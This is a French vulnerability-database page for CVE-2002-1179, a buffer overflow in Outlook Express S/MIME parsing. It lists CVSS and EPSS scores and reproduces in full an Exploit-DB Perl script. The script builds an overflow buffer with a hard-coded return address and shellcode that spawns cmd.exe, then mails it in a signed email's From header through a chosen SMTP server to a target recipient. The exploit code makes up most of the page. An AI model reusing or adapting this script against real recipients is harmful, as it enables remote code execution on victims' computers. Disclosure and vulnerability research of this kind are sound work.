CVE-2002-1179

EPSS

48.08%V4

Vecteur

Network

Publié

2004-09-01
02h00 +00:00

Modifié

2007-11-12
23h00 +00:00

Liens officiels

CVE.org

NVD

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des notifications

Liste des Notifications

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez spécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2025-1234

Planifications

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions du CVE

Buffer overflow in the S/MIME Parsing capability in Microsoft Outlook Express 5.5 and 6.0 allows remote attackers to execute arbitrary code via a digitally signed email with a long "From" address, which triggers the overflow when the user views or previews the message.

Informations du CVE

Métriques

Métriques	Score	Gravité	CVSS Vecteur	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	44.63%	–	–
2023-03-12	–	–	–	40.74%	–
2023-08-13	–	–	–	59.75%	–
2024-02-11	–	–	–	59.75%	–
2024-03-10	–	–	–	71.19%	–
2024-06-02	–	–	–	71.19%	–
2024-09-22	–	–	–	65.12%	–
2024-12-22	–	–	–	43.67%	–
2025-03-02	–	–	–	43.67%	–
2025-01-19	–	–	–	43.67%	–
2025-03-09	–	–	–	43.67%	–
2025-03-18	–	–	–	–	44.87%
2025-03-30	–	–	–	–	48.08%
2025-04-12	–	–	–	–	48.08%
2025-04-12	–	–	–	–	48.08,%

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Date	Percentile
2022-02-06	98%
2023-03-12	97%
2023-08-13	97%
2024-02-11	98%
2024-03-10	98%
2024-06-02	98%
2024-09-22	98%
2024-12-22	97%
2025-03-02	98%
2025-01-19	97%
2025-03-09	98%
2025-03-18	97%
2025-03-30	97%
2025-04-12	98%
2025-04-12	98%

Informations sur l'Exploit

Exploit Database EDB-ID : 21932

Date de publication : 2002-10-09 22h00 +00:00
Auteur : Noam Rathaus
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/5944/info Microsoft Outlook Express contains an unchecked buffer in the code that generates warning messages when certain error conditions associated with digital signatures are encountered. Execution of arbitrary code in the security context of the current user is possible. Microsoft has verified that this vulnerability exists in Outlook Express 5.5 and 6.0. Earlier versions may be affected, however, they are no longer supported by Microsoft. # (The exploit code will not work straight out of the "box") # Noam Rathaus - Beyond Security Ltd.'s SecurITeam # Note the certificate is a valid one for noamr@beyondsecurity.com issued by Thawe. # Message (buffer) starts at 0006F578 (circa) # Message (buffer) ends at 0006F94C (circa) # The problem lies here: # # 5F26F339 mov ebx,dword ptr [eax] # . # . # 5F26F354 call dword ptr [ebx+10h] # . # . # Now since we control the EAX, but we can't provide it with NULLs, we must find somewhere in the # kernel memory a place that has the following number (of our buffer), for example: # # We found 00 06 F5 A4 at 5F1835C7 # # Windows 2000 SP3 Internet Explorer 5.5 # # So our 5F1835C7 is placed in EAX, which has this memory content 0006F5A4 # Causing our MOV to place in EBX the the following content 00 06 F5 A4. # The final EIP call goes out to 0006F5B4, this is where our arbitrary code lies. # use Getopt::Std; use IO::Socket::INET; use MIME::Base64; getopt('tfhi'); if (!$opt_f || !$opt_t || !$opt_h) { print "Usage: malformed_email.pl <-t to> <-f from> <-h smtphost> <-i start number>\r\nstart size should be bigger than 100\r\n"; exit; } # 1234567890123456789012345612345678901234567890123456 $buffer = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"x11; # 584 $buffer = join ('', $buffer, "123456789012"); #$addr = "\x34\xF3\x26\x5F"; #$addr = "\xC7\x35\x18\x5F"; # points to 0006F5A4 $addr = "\x9F\x37\xD4\x77"; # points to 0006F3C0 $buffer = join ('', $buffer, $addr); # used by the mov EBX, [EAX] # 6 lines = 6*26 # This is to place our code in the right place # + 8 = 164 # Calculation done accordigly. # + 10h = 16 + 164 = 180 $buffer = join ('', $buffer, "A"x180); # We move our buffer to the right place. #$buffer = join ('', $buffer, "\xC3\xAF\x01\x78"); # address of cmd.exe (This will just run CMD.exe, #$buffer = join ('', $buffer, "A"x$opt_i); # but will get stuck) # A lot neater shellcode for cmd.exe $buffer = join ('', $buffer, "\x55"); # push ebp $buffer = join ('', $buffer, "\x54"); # push esp $buffer = join ('', $buffer, "\x5D"); # pop ebp $buffer = join ('', $buffer, "\x33\xFF"); # xor edi,edi $buffer = join ('', $buffer, "\x57"); # push edi $buffer = join ('', $buffer, "\xC6\x45\xFC\x63"); # mov byte ptr [ebp-04h],'c' $buffer = join ('', $buffer, "\xC6\x45\xFD\x6D"); # mov byte ptr [ebp-03h],'m' $buffer = join ('', $buffer, "\xC6\x45\xFE\x64"); # mov byte ptr [ebp-02h],'d' $buffer = join ('', $buffer, "\x57"); # push edi $buffer = join ('', $buffer, "\xC6\x45\xF8\x03"); # mov byte ptr[ebp-08h],3 ;Max window $buffer = join ('', $buffer, "\x8D\x45\xFC"); # lea eax,[ebp-4h] $buffer = join ('', $buffer, "\x50"); # push eax $buffer = join ('', $buffer, "\xB8\x7E\x68\x4C\x67"); # mov eax,7E684C67h ;CreateProcess@77E684C6h $buffer = join ('', $buffer, "\xC1\xC8\x04"); # ror eax, 4 $buffer = join ('', $buffer, "\xFF\xD0"); # call eax $buffer = join ('', $buffer, "\xB8\x7E\xB8\x54\xB7"); # mov eax,7EB854B7h ;FatalExit@77EB854Bh $buffer = join ('', $buffer, "\xC1\xC8\x04"); # ror eax, 4 $buffer = join ('', $buffer, "\xFF\xD0"); # call eax $buffer = join ('', $buffer, "A"x$opt_i); $sock = IO::Socket::INET->new(PeerAddr => "$opt_h",PeerPort => '25', Proto => 'tcp'); unless (<$sock> =~ "220") { die "Not a SMTP Server?" } print "Connected\r\n"; print $sock "HELO you\r\n"; unless (<$sock> =~ "250") { die "HELO failed" } print "MAIL FROM: $opt_f\r\n"; print $sock "MAIL FROM: $opt_f\r\n"; sleep(1); unless (<$sock> =~ "250") { die "MAIL FROM failed" } print "RCPT TO: $opt_t\r\n"; print $sock "RCPT TO: $opt_t\r\n"; sleep(1); unless (<$sock> =~ "250") { print $sock "RCPT TO: <$opt_t>\r\n"; unless (<$sock> =~ "250") { die "RCPT TO failed" } } print $sock "DATA\r\n"; unless (<$sock> =~ "354") { die "DATA failed" } sleep(1); $lengthy = length($buffer); print "Test #$temp, [$buffer], ", length($buffer), "\n"; print $sock <<EOF; From: $buffer\r To: $opt_t\r Subject: Test #$temp - $lengthy\r Date: Wed, 31 Jul 2002 16:05:00 -0300\r MIME-Version: 1.0\r Content-Type: multipart/signed;\r micalg=SHA1;\r protocol="application/x-pkcs7-signature";\r boundary="----=_NextPart_000_002A_01C238AC.03ECDBE0"\r \r This is a multi-part message in MIME format.\r \r ------=_NextPart_000_002A_01C238AC.03ECDBE0\r Content-Type: text/plain;\r charset="iso-8859-1"\r Content-Transfer-Encoding: quoted-printable\r \r Test\r \r \r ------=_NextPart_000_002A_01C238AC.03ECDBE0\r Content-Type: application/x-pkcs7-signature;\r name="smime.p7s"\r Content-Transfer-Encoding: base64\r Content-Disposition: attachment;\r filename="smime.p7s"\r \r MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIII7DCCAoow\r ggHzoAMCAQICAwgkVjANBgkqhkiG9w0BAQQFADCBkjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdl\r c3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUxHTAbBgNVBAsT\r FENlcnRpZmljYXRlIFNlcnZpY2VzMSgwJgYDVQQDEx9QZXJzb25hbCBGcmVlbWFpbCBSU0EgMjAw\r MC44LjMwMB4XDTAyMDgyMzIwMDcwN1oXDTAzMDgyMzIwMDcwN1owSjEfMB0GA1UEAxMWVGhhd3Rl\r IEZyZWVtYWlsIE1lbWJlcjEnMCUGCSqGSIb3DQEJARYYbm9hbXJAYmV5b25kc2VjdXJpdHkuY29t\r MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCniCtFVDYtv7D7EWVI0nA6uiFyz30SNveNkuKI\r lRctvHPp0bYq3MzcVfFiGBNVKDIQ+vboffupwsLQMqXiLxBLCUvDktZa7GwgIr7yuqI8RiW/Hy3J\r i5SsyiGIdQzTgd/azB6k3jWLZd6iEEprsqm18sQ1EQd6FDdaa8/xtFiL2QIDAQABozUwMzAjBgNV\r HREEHDAagRhub2FtckBiZXlvbmRzZWN1cml0eS5jb20wDAYDVR0TAQH/BAIwADANBgkqhkiG9w0B\r AQQFAAOBgQAqlzpT9/02prGZioJOqlSl+Msv7RwGx6jUTyySta6Tc3KDjL3v8iZ4GUWrN+K/jmLv\r O1V3e6VTgYP8gRq+BsDcPoDX8ZTC8WqzGWIREsAlGciYskI/XuthQltXfh3hCOEsXU48fspivAxA\r pOuAxaYtX6jO5eNeJ/eGxqyySVgRCzCCAykwggKSoAMCAQICAQwwDQYJKoZIhvcNAQEEBQAwgdEx\r CzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUgVG93bjEa\r MBgGA1UEChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNVBAsTH0NlcnRpZmljYXRpb24gU2Vydmlj\r ZXMgRGl2aXNpb24xJDAiBgNVBAMTG1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBDQTErMCkGCSqG\r SIb3DQEJARYccGVyc29uYWwtZnJlZW1haWxAdGhhd3RlLmNvbTAeFw0wMDA4MzAwMDAwMDBaFw0w\r MjA4MjkyMzU5NTlaMIGSMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYD\r VQQHEwlDYXBlIFRvd24xDzANBgNVBAoTBlRoYXd0ZTEdMBsGA1UECxMUQ2VydGlmaWNhdGUgU2Vy\r dmljZXMxKDAmBgNVBAMTH1BlcnNvbmFsIEZyZWVtYWlsIFJTQSAyMDAwLjguMzAwgZ8wDQYJKoZI\r hvcNAQEBBQADgY0AMIGJAoGBAN4zMqZjxwklRT7SbngnZ4HF2ogZgpcO40QpimM1Km1wPPrcrvfu\r dG8wvDOQf/k0caCjbZjxw0+iZdsN+kvx1t1hpfmFzVWaNRqdknWoJ67Ycvm6AvbXsJHeHOmr4BgD\r qHxDQlBRh4M88Dm0m1SKE4f/s5udSWYALQmJ7JRr6aFpAgMBAAGjTjBMMCkGA1UdEQQiMCCkHjAc\r MRowGAYDVQQDExFQcml2YXRlTGFiZWwxLTI5NzASBgNVHRMBAf8ECDAGAQH/AgEAMAsGA1UdDwQE\r AwIBBjANBgkqhkiG9w0BAQQFAAOBgQBzG28mZYv/FTRLWWKK7US+ScfoDbuPuQ1qJipihB+4h2N0\r HG23zxpTkUvhzeY42e1Q9DpsNJKs5pKcbsEjAcIJp+9LrnLdBmf1UG8uWLi2C8FQV7XsHNfvF7bV\r iJu3ooga7TlbOX00/LaWGCVNavSdxcORL6mWuAU8Uvzd6WIDSDCCAy0wggKWoAMCAQICAQAwDQYJ\r KoZIhvcNAQEEBQAwgdExCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNV\r BAcTCUNhcGUgVG93bjEaMBgGA1UEChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNVBAsTH0NlcnRp\r ZmljYXRpb24gU2VydmljZXMgRGl2aXNpb24xJDAiBgNVBAMTG1RoYXd0ZSBQZXJzb25hbCBGcmVl\r bWFpbCBDQTErMCkGCSqGSIb3DQEJARYccGVyc29uYWwtZnJlZW1haWxAdGhhd3RlLmNvbTAeFw05\r NjAxMDEwMDAwMDBaFw0yMDEyMzEyMzU5NTlaMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2Vz\r dGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5n\r MSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtUaGF3\r dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZyZWVtYWls\r QHRoYXd0ZS5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANRp19SwlGRbcelH2AxRtupy\r kbCEXn0tDY97Et+FJXUodDpCLGMnn5V7S+9+GYcdhuqj3bnOlmQawhRuRKx85o/oTQ9xH0A4pgCj\r h3j2+ZSGXq3qwF5269kUo11uenwMpUtVfwYZKX+emibVars4JAhqmMex2qOYkf152+VaxBy5AgMB\r AAGjEzARMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEAx+ySfk749ZalZ2IqpPBN\r EWDQb41gWGGsJrtSNVwIzzD7qEqWih9iQiOMFw/0umScF6xHKd+dmF7SbGBxXKKs3Hnj524ARx+1\r DSjoAp3kmv0T9KbZfLH43F8jJgmRgHPQFBveQ6mDJfLmnC8Vyv6mq4oHdYsM3VGEa+T40c53ooEx\r ggH+MIIB+gIBATCBmjCBkjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAG\r A1UEBxMJQ2FwZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUxHTAbBgNVBAsTFENlcnRpZmljYXRlIFNl\r cnZpY2VzMSgwJgYDVQQDEx9QZXJzb25hbCBGcmVlbWFpbCBSU0EgMjAwMC44LjMwAgMIJFYwCQYF\r Kw4DAhoFAKCBujAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wMjA4\r MjMyMTEwNDRaMCMGCSqGSIb3DQEJBDEWBBRD9XX8J/0AYeJY3zpPIdPQTvsSdzBbBgkqhkiG9w0B\r CQ8xTjBMMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMC\r BzANBggqhkiG9w0DAgIBKDAHBgUrDgMCHTANBgkqhkiG9w0BAQEFAASBgJqFZrTmAcNoODUFKapu\r b09XY3dR/Frb6LScoOT8mJk28PIgxTMzxw7IKgdb40IzcsgoJniCRY+wBcBO4nwKXV+KnTgM1RNX\r ppw3Wm7KUqusD+K7rSFbchaJ0mkefEn/ueN7CWV/Gbe/TpnGQ/nu2CzmrLxQyWlnITcS+xwVTv0b\r AAAAAAAA\r \r ------=_NextPart_000_002A_01C238AC.03ECDBE0--\r \r\n\r\n.\r\n\r EOF print "Send complete\r\n"; sleep(1); print $sock "QUIT\r\n"; sleep(1); close($sock); print "Disconnected\r\n";